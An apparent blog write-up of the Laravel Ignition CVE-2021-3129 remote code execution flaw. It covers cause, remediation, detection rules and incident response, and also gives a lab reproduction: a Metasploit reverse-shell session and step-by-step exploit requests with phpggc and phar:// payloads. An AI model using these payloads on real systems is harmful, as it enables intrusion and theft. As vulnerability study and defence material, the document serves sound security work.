CVE-2021-3129 Vulnerability Reproduction: Remote Code Execution in Laravel


laravel/CVE-2021-3129

CVE-2021-3129 is one of the Laravel remote code execution vulnerabilities that has been exploited at scale by automated tooling in recent years; in the wild it has been used to drop web shells in bulk, mine cryptocurrency and move laterally inside internal networks.

1. Vulnerability Overview

  • Affected product: Laravel
  • Vulnerability ID: CVE-2021-3129
  • Vulnerable component: Ignition (error debugging component)
  • Vulnerability type: remote code execution (RCE)

Trigger conditions:

  • Laravel is running with APP_DEBUG=true
  • facade/ignition is in use
  • The /_ignition/execute-solution endpoint is reachable

2. Root Cause Analysis

Core issue

In debug mode Laravel exposes the Ignition endpoint:

    POST /_ignition/execute-solution

This endpoint runs "solutions" (automated fix suggestions), for example:

    {
      "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
      "parameters": {
          "variableName": "..."
      }
    }

The problem is that:

👉 the endpoint lets an attacker modify the log file through specific parameters
👉 combined with PHP's phar:// deserialization behaviour
👉 this triggers deserialization
👉 and executes arbitrary code

3. Exploit Chain Diagram

📌 Attack flow breakdown

    Internet access
       ↓
    /_ignition/execute-solution
       ↓
    malicious phar written into the log
       ↓
    log path changed to phar://
       ↓
    deserialization triggered
       ↓
    RCE

4. Technical Details

1️⃣ The attacker constructs the payload

A PHP deserialization gadget chain is used; common chains are:

  • Monolog
  • Laravel SerializableClosure
  • payloads generated with PHPGGC

2️⃣ Attack steps

  1. Clear the log
  2. Write the malicious phar payload
  3. Change the log path
  4. Trigger phar parsing

5. Attack Chain (Kill Chain)

① Recon

  • Access /_ignition/health-check
  • Identify the Laravel version
  • Detect APP_DEBUG

② Weaponization

Generate with PHPGGC:

    phpggc Laravel/RCE1 system id -p phar

③ Delivery

    POST /_ignition/execute-solution

④ Exploitation

Trigger the phar deserialization

⑤ Persistence

  • Drop a web shell
  • Add a scheduled task
  • Download a miner

⑥ Lateral Movement

  • Scan for internal Redis instances
  • Brute-force databases

6. STRIDE Threat Model

  • S (Spoofing): forged internal debugging requests
  • T (Tampering): tampering with the log file
  • R (Repudiation): covert command execution
  • I (Information disclosure): reading the .env file
  • D (Denial of service): resource exhaustion
  • E (Elevation of privilege): privilege escalation

7. ATT&CK Mapping

  • Initial Access: T1190 Exploit Public-Facing Application
  • Execution: T1059.004 Unix Shell
  • Persistence: T1505.003 Web Shell
  • Discovery: T1083 File and Directory Discovery
  • Lateral Movement: T1021 Remote Services
  • Impact: T1496 Resource Hijacking (cryptomining)

8. Remediation (Official Guidance)

✅ 1. Upgrade

Upgrade Laravel to a fixed version:

    >= 8.4.2
    >= 7.30.4
    >= 6.20.14

✅ 2. Turn off debug mode

    APP_DEBUG=false

✅ 3. Block public access

With Nginx:

    location ~ ^/_ignition {
        deny all;
    }
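An added example (not code from Laravel, Ignition or vulhub) that checks the remediation points above against a deployment's .env and composer.lock: debug mode on, debug mode on in production, and package versions below the fixed releases. The function names and sample inputs are this example's own; the facade/ignition 2.5.2 threshold comes from the Metasploit module description quoted later in this article.

```python
# Added example for this write-up (not Laravel, Ignition or vulhub code): audits a
# deployment for the CVE-2021-3129 preconditions from .env and composer.lock text.
import json
import re

# Minimum fixed versions: laravel/framework from the write-up, facade/ignition
# from the Metasploit module description (versions before 2.5.2 are affected).
FIXED_FRAMEWORK = {8: (8, 4, 2), 7: (7, 30, 4), 6: (6, 20, 14)}
FIXED_IGNITION = (2, 5, 2)


def parse_version(v):
    """'v8.4.1' -> (8, 4, 1); pre-release suffixes such as '-beta1' are dropped."""
    nums = [int(n) for n in re.findall(r"\d+", v.split("-")[0])][:3]
    return tuple(nums + [0] * (3 - len(nums)))


def parse_env(text):
    """Minimal .env parser: KEY=value lines, comments skipped, quotes stripped."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip('"').strip("'")
    return env


def audit(env_text, lock_text):
    """Return a list of findings; an empty list means no precondition was observed."""
    env = parse_env(env_text)
    findings = []
    if env.get("APP_DEBUG", "false").lower() == "true":
        findings.append("APP_DEBUG=true exposes /_ignition/* (set APP_DEBUG=false)")
        if env.get("APP_ENV", "").lower() == "production":
            findings.append("APP_DEBUG=true while APP_ENV=production")
    versions = {p["name"]: parse_version(p["version"])
                for p in json.loads(lock_text).get("packages", [])}
    fw = versions.get("laravel/framework")
    fixed = FIXED_FRAMEWORK.get(fw[0]) if fw else None
    if fixed and fw < fixed:
        findings.append("laravel/framework %d.%d.%d < %d.%d.%d" % (fw + fixed))
    ig = versions.get("facade/ignition")
    if ig and ig < FIXED_IGNITION:
        findings.append("facade/ignition %d.%d.%d < 2.5.2" % ig)
    return findings


# Constructed sample inputs (not taken from a real deployment).
SAMPLE_ENV = "APP_NAME=Laravel\nAPP_ENV=production\nAPP_DEBUG=true\n"
SAMPLE_LOCK = json.dumps({"packages": [
    {"name": "laravel/framework", "version": "v8.4.1"},
    {"name": "facade/ignition", "version": "2.5.1"},
]})

if __name__ == "__main__":
    for finding in audit(SAMPLE_ENV, SAMPLE_LOCK):
        print("[!]", finding)
```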

9. Pseudocode Fix Example

❌ Vulnerable logic (simplified)

    if (APP_DEBUG) {
       Route::post('/_ignition/execute-solution', function($request){
           $solution = $request->solution;
           execute($solution);
       });
    }

✅ Safe fix logic

    if (APP_ENV === 'local') {
       Route::post('/_ignition/execute-solution', function($request){
           abort(403);
       });
    }

or:

    if (!isTrustedIP(request()->ip())) {
        abort(403);
    }

10. Detection and Protection Rules

1️⃣ WAF rules

Match the URI:

    /_ignition/execute-solution

Match the phar wrapper:

    phar://

Match the solution class:

    Facade\Ignition

2️⃣ Suricata example

    alert http any any -> any any ( \
        msg:"Laravel CVE-2021-3129 RCE Attempt"; \
        flow:established,to_server; \
        http.method; content:"POST"; \
        http.uri; content:"/_ignition/execute-solution"; \
        classtype:web-application-attack; \
        sid:3129; rev:1; \
    )

3️⃣ Host-level detection

Detect PHP spawning system commands:

    ps aux | grep php

Detect web shells:

    find /var/www -name "*.php" -mtime -1

4️⃣ Log detection (SIEM approach)

    WHERE request_uri LIKE "%_ignition%"
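A worked version of the WAF and SIEM ideas above, as an added example written for this article (not code from any WAF or SIEM product): the access-log scanner flags the Ignition URIs, and the body inspector flags the wrapper and class patterns where the JSON body is visible. The rule names, the two-indicator blocking threshold and all sample log lines and bodies are constructed here.

```python
# Added example for this write-up, not code from a WAF or SIEM product. scan_access_log()
# implements the SIEM idea above (URI only: access logs carry no body); inspect_body()
# covers the WAF layer where the JSON body is visible. Rule names and samples are constructed.
import json
import re

# Combined log format: ip ident user [time] "METHOD URI PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*"')

URI_RULES = {
    "/_ignition/execute-solution": ("high", "execute-solution endpoint"),
    "/_ignition/health-check": ("low", "Ignition recon probe"),
}
# Indicators seen in the solution / viewFile parameters during exploitation.
BODY_PATTERNS = [
    (re.compile(r"php://filter/.*write=", re.I), "php://filter write chain"),
    (re.compile(r"phar://", re.I), "phar:// wrapper"),
    (re.compile(r"laravel\.log", re.I), "log file targeted"),
    (re.compile(r"Facade\\+Ignition", re.I), "Ignition solution class"),
]

def scan_access_log(lines):
    """Return (severity, tag, ip, method, uri) for each line hitting an Ignition URI."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("uri").split("?")[0].rstrip("/")
        if path in URI_RULES:
            sev, tag = URI_RULES[path]
            hits.append((sev, tag, m.group("ip"), m.group("method"), m.group("uri")))
    return hits

def inspect_body(body):
    """Return the indicator tags matched in one JSON request body ([] if none / not JSON)."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, dict):
        return []
    params = data.get("parameters")
    values = [data.get("solution", "")] + (list(params.values()) if isinstance(params, dict) else [])
    text = " ".join(str(v) for v in values)
    return [tag for pat, tag in BODY_PATTERNS if pat.search(text)]

def should_block(body):
    """WAF decision used in this example: two or more distinct indicators in one body."""
    return len(inspect_body(body)) >= 2

# Constructed sample data: addresses, timestamps and user agents are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Mar/2026:15:50:01 +0800] "GET /_ignition/health-check HTTP/1.1" 200 45 "-" "curl/7.88"',
    '203.0.113.7 - - [02/Mar/2026:15:50:02 +0800] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.31"',
    '198.51.100.4 - - [02/Mar/2026:15:51:10 +0800] "GET /index.php HTTP/1.1" 200 1731 "-" "Mozilla/5.0"',
]
SAMPLE_BODY = json.dumps({"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
                         "parameters": {"variableName": "username", "viewFile":
                         "php://filter/write=convert.base64-decode/resource=../storage/logs/laravel.log"}})
```

In a SIEM the scanner's output would be joined on source IP, so that a health-check probe followed by execute-solution posts from the same address is escalated as one incident.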

11. Incident Response Procedure

① Isolate immediately

    systemctl stop php-fpm

② Check for web shells

    grep -R "eval(" /var/www

③ Check whether .env has been leaked

    cat .env

④ Check scheduled tasks

    crontab -l

⑤ Network connections

    netstat -antp

⑥ Log forensics

    grep "_ignition" access.log

12. Real-World Risk

This vulnerability was exploited at scale in 2021:

  • automated scanners
  • mass cryptomining
  • compromised cloud servers

Its severity comes from one fact:

debug mode is exposed to the public internet by default

13. Enterprise Defence Loop

    Development → no debug mode in releases
    Deployment  → reachable from the internal network only
    Runtime     → WAF blocking
    Host layer  → monitor PHP process execution
    SOC         → attack chain analysis

14. Key Takeaways

The essence of CVE-2021-3129:

exposed debug endpoint + file write + phar deserialization = RCE

It is a textbook case of:

  • "a developer convenience feature being abused"
  • "an environment misconfiguration turning critical"

Preparation

Common Docker commands

    docker compose pull           # pull the remote images to the local host
    docker compose up -d          # start the containers detached (no log output in the foreground)
    docker ps                     # list running containers and their published ports
    docker compose logs           # view the container logs
    docker compose down           # stop and remove the containers
    docker compose build          # (re)build the service images
    docker compose exec web bash  # open a Bash shell inside the service container named web

Reproduction

Method 1

Metasploit is used directly here, since it already has a module for this vulnerability, which makes the process quicker and more convenient.

    msfconsole -q
    msf > search laravel                

    Matching Modules
    ================

       #  Name                                                       Disclosure Date  Rank       Check  Description
       -  ----                                                       ---------------  ----       -----  -----------
       0  exploit/linux/http/invoiceninja_unauth_rce_cve_2024_55555  2024-12-13       excellent  Yes    Invoice Ninja unauthenticated PHP Deserialization Vulnerability
       1    _ target: PHP                                           .                .          .      .
       2    _ target: Unix/Linux Command                            .                .          .      .
       3  exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556  2024-12-13       excellent  Yes    InvoiceShelf unauthenticated PHP Deserialization Vulnerability
       4    _ target: PHP                                           .                .          .      .
       5    _ target: Unix/Linux Command                            .                .          .      .
       6  exploit/unix/http/laravel_token_unserialize_exec           2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution
       7  exploit/multi/php/ignition_laravel_debug_rce               2021-01-13       excellent  Yes    Unauthenticated remote code execution in Ignition
       8    _ target: Unix (In-Memory)                              .                .          .      .
       9    _ target: Windows (In-Memory)                           .                .          .      .


    Interact with a module by name or index. For example info 9, use 9 or use exploit/multi/php/ignition_laravel_debug_rce
    After interacting with a module you can manually set a TARGET with set TARGET 'Windows (In-Memory)'

    msf > Interrupt: use the 'exit' command to quit
    msf > use exploit/multi/php/ignition_laravel_debug_rce
    [*] Using configured payload cmd/unix/reverse_bash


Option, meaning and purpose:

  • RHOSTS: IP address or hostname of the target, i.e. the machine running the vulnerable Laravel application
  • RPORT: port the web service listens on; usually 80 or 8080, depending on the application configuration
  • LHOST: IP address of the attacking machine (where Metasploit runs); used for the reverse connection, as the target connects back to this IP and port (LPORT)

    msf exploit(multi/php/ignition_laravel_debug_rce) > info

           Name: Unauthenticated remote code execution in Ignition
         Module: exploit/multi/php/ignition_laravel_debug_rce
       Platform: Unix, Windows
           Arch: cmd
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2021-01-13

    Provided by:
      Heyder Andrade <eu@heyderandrade.org>
      ambionics

    Module side effects:
     ioc-in-logs

    Module stability:
     crash-safe

    Module reliability:
     repeatable-session

    Available targets:
          Id  Name
          --  ----
      =>  0   Unix (In-Memory)
          1   Windows (In-Memory)

    Check supported:
      Yes
      
    Basic options:
      Name       Current Setting              Required  Description
      ----       ---------------              --------  -----------
      LOGFILE                                 no        Laravel log file absolute path
      Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
      RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
      RPORT      80                           yes       The target port (TCP)
      SSL        false                        no        Negotiate SSL/TLS for outgoing connections
      TARGETURI  /_ignition/execute-solution  yes       Ignition execute solution path
      VHOST                                   no        HTTP server virtual host

    Payload information:

    Description:
      Ignition before 2.5.2, as used in Laravel and other products,
      allows unauthenticated remote attackers to execute arbitrary code
      because of insecure usage of file_get_contents() and file_put_contents().
      This is exploitable on sites using debug mode with Laravel before 8.4.2.

    References:
      https://nvd.nist.gov/vuln/detail/CVE-2021-3129
      https://www.ambionics.io/blog/laravel-debug-rce


    View the full module info with the info -d command.
    msf exploit(multi/php/ignition_laravel_debug_rce) > options

    Module options (exploit/multi/php/ignition_laravel_debug_rce):

       Name       Current Setting              Required  Description
       ----       ---------------              --------  -----------
       LOGFILE                                 no        Laravel log file absolute path
       Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
       RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
       RPORT      80                           yes       The target port (TCP)
       SSL        false                        no        Negotiate SSL/TLS for outgoing connections
       TARGETURI  /_ignition/execute-solution  yes       Ignition execute solution path
       VHOST                                   no        HTTP server virtual host


    Payload options (cmd/unix/reverse_bash):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Unix (In-Memory)



    View the full module info with the info, or info -d command.


    msf exploit(multi/php/ignition_laravel_debug_rce) > set rhosts 192.168.0.41
    rhosts => 192.168.0.41
    msf exploit(multi/php/ignition_laravel_debug_rce) > set rport 8080
    rport => 8080
    msf exploit(multi/php/ignition_laravel_debug_rce) > set lhost 192.168.0.41
    lhost => 192.168.0.41
    msf exploit(multi/php/ignition_laravel_debug_rce) > run
    [*] Started reverse TCP handler on 192.168.0.41:4444 
    [*] Running automatic check ("set AutoCheck false" to disable)
    [*] Checking component version to 192.168.0.41:8080
    [+] The target appears to be vulnerable.
    [*] Command shell session 1 opened (192.168.0.41:4444 -> 172.18.0.2:41486) at 2026-03-02 15:56:58 +0800
    id

    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    uname -a
    Linux e05c650ff508 6.18.5+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.18.5-1kali1 (2026-01-19) x86_64 GNU/Linux
    shell
    [*] Trying to find binary 'python' on the target machine
    [-] python not found
    [*] Trying to find binary 'python3' on the target machine
    [-] python3 not found
    [*] Trying to find binary 'script' on the target machine
    [*] Found script at /usr/bin/script
    [*] Using `script` to pop up an interactive shell
    bash
    bash
    www-data@e05c650ff508:/var/www/html$ whoami
    whoami
    www-data
    www-data@e05c650ff508:/var/www/html$ ls -al
    ls -al
    total 28
    drwxr-xr-x 1 www-data www-data 4096 Nov 17  2020 .
    drwxr-xr-x 1 www-data www-data 4096 Feb  5  2021 ..
    -rw-r--r-- 1 www-data www-data  603 Nov 17  2020 .htaccess
    -rw-r--r-- 1 www-data www-data    0 Nov 17  2020 favicon.ico
    -rw-r--r-- 1 www-data www-data 1731 Nov 17  2020 index.php
    -rw-r--r-- 1 www-data www-data   24 Nov 17  2020 robots.txt
    -rw-r--r-- 1 www-data www-data 1194 Nov 17  2020 web.config
    www-data@e05c650ff508:/var/www/html$ pwd
    pwd
    /var/www/html
    www-data@e05c650ff508:/var/www/html$ exit
    exit
    exit
    $ exit
    exit
    Script done, file is /dev/null
    q
    sh: 20: q: not found
    q
    sh: 21: q: not found
    ^C
    Abort session 1? [y/N]  ^C
    [*] 192.168.0.41 - Command shell session 1 closed.  Reason: User exit
    msf exploit(multi/php/ignition_laravel_debug_rce) > Interrupt: use the 'exit' command to quit
    msf exploit(multi/php/ignition_laravel_debug_rce) > exit


The overall Metasploit workflow is:
search for the framework's historical vulnerabilities --> select the module --> review its info and options --> set the target address and port --> enter the shell --> check privileges and identity. Following the ATT&CK chain, a real intrusion would continue with scheduled tasks, data theft and trace removal; those steps are omitted here.

Method 2

  1. Send a POST request to the /_ignition/execute-solution endpoint with Content-Type set to application/json and the JSON data in the body.

    POST /_ignition/execute-solution HTTP/1.1
    Host: 192.168.0.41:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Connection: close
    Content-Type: application/json
    Content-Length: 173

    {
      "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
      "parameters": {
        "variableName": "username",
        "viewFile": "xxxxxx"
      }
    }

The subsequent requests differ only in the value of the viewFile parameter (and the corresponding Content-Length), so the full packets are not repeated below.

    # clone phpggc
    git clone https://github.com/ambionics/phpggc.git

    # or download and unpack the archive
    wget https://github.com/ambionics/phpggc/archive/refs/heads/master.zip
    unzip master.zip
    cd phpggc-master
    ./phpggc

The preparation required before step 3 is simply to run the commands above.

  2. Change the viewFile parameter and send the following value to clear the log:

    php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log


  3. Generate the serialized exploitation POC with phpggc:

    php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "phpinfo();" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"

  4. Set "viewFile": "AA" and send the packet, which adds a prefix to the log once.


  5. Append an A to the end of the POC (the encoded output from step 3), otherwise an error is returned.



  6. Send the following packet to clean up the log file:

    POST /_ignition/execute-solution HTTP/1.1
    Host: localhost:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Connection: close
    Content-Type: application/json
    Content-Length: 299

    {
      "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
      "parameters": {
        "variableName": "username",
        "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
      }
    }

  7. Use phar:// to trigger deserialization and execute arbitrary code:

    phar:///var/www/storage/logs/laravel.log/test.txt

I did not manage to capture a screenshot of a successful run; it kept returning a 302 error. I suspect step 6 is the cause, which forced me to start over many times, and I did not succeed after several attempts. At that point I ran out of patience, and my head was a little fuzzy as well. Other possible causes are that the A was not appended after the POC, or that phpinfo() has been disabled.


Statements

AI-assisted writing statement

This article was written with AI assistance and manually reviewed and revised by the author. It is intended for technical exchange and learning; corrections of any omissions or errors are welcome.

Disclaimer

The content of this article is for learning and research purposes only and is not guaranteed to be fully accurate or applicable to every environment. The author and the platform accept no legal liability for any consequences arising from actions taken on the basis of this article. Comply with applicable laws and regulations and do not use these techniques for illegal purposes.

Copyright notice

This is original content and the copyright belongs to the author. Commercial reproduction without authorization is prohibited. Non-commercial reproduction must cite the source and retain this notice.